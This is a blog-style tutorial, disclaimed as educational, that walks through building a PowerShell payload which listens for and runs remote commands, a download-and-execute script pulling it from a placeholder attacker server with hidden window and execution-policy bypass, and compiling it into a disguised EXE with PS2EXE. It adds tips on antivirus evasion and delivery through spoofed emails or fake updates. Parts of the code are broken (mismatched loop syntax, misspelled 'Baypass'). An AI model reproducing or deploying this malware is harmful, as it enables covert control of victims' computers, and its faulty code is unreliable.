The provided information is only for educational use.

Today we gonna do some sniki biki style hacking with PowerShell.

I assume you have Kali Linux installed and running.
First we need to install wine so we can execute EXE. Run:
sudo apt install wine64

Once installed, download PS2EXE, you can get it here:
In this post we gonna use a PS script provided by staaldraad.

Lets start creating our powersehll script/payload.
First of all we need to get the computers IP address. We will do it with a oneliner.
$IPV4=(Test-Connection -ComputerName $env:computername -count 1).ipv4address.IPAddressToString

Running this you will get your IP address of the current computer, so if an victim runs it, we will get his IP address.
Once we get the address we can use the script provided by staaldraad. The whole script would look like this:

## getting the IPv4 Address
$IPV4=(Test-Connection -ComputerName $env:computername -count 1).ipv4address.IPAddressToString
## Setting up listener
$socket = new-object System.Net.Sockets.TcpClient($IPV4, 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
$writer.Write("> ");
$read = $null;
while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
$out = $out.split(' ')
$res = [string](&$out[0] $out[1..$out.length]);
if($res -ne $null){ $writer.WriteLine($res)}
}While (!$out.equals("exit"))

Let’s call the script ps_8080.ps1
PS: You can use a online Virus scan tool like to see if it will pass or be detected by AV. In our example only ESET has detected it as a trojan. Also please don’t upload to virus total!
Now we need our victim to download the script. So my though was an addition script again.
I would recomend to run a http server like apache or nginx, where you could easily store the file. Or you can use portforwarding on your router and run the server on your machine, but I wont describe how to do that in this post. Alternatively you can upload it in the cloud and share the file with someone.

Let’s assume we have an https server on the internet. The script would look like this:

$url = "http://YOURIPADDRESS/ps_8080.ps1"
$output = "%TMP%\ps_8080.ps1"
Invoke-WebRequest -Uri $url -OutFile $output
powershell -noprofile -windowstyle hidden -noninteractive –executionpolicy Baypass –noExit -command .\$output

I’ll call the script download+execute.ps1
So now we have a download and execute script. Now I would like to convert it to an EXE. For that we going to use our previous downloaded PS2EXE. We can even choose an icon to look less suspicious. Also let’s supress the output and error output, just check the 2 checkboxes.

All is set up, just press compile now.
Now once downloaded and executed, there will be an open listener on port 8080.

For that you can use metasploit or netcat to connect to to the listener. I will not show how that works in this post, but in a later one.
There are different ways how you can deploy the script/EXE, spoof emails, hijack downloads, hijack browsers and pretend to be an update and many more.

Leave a Reply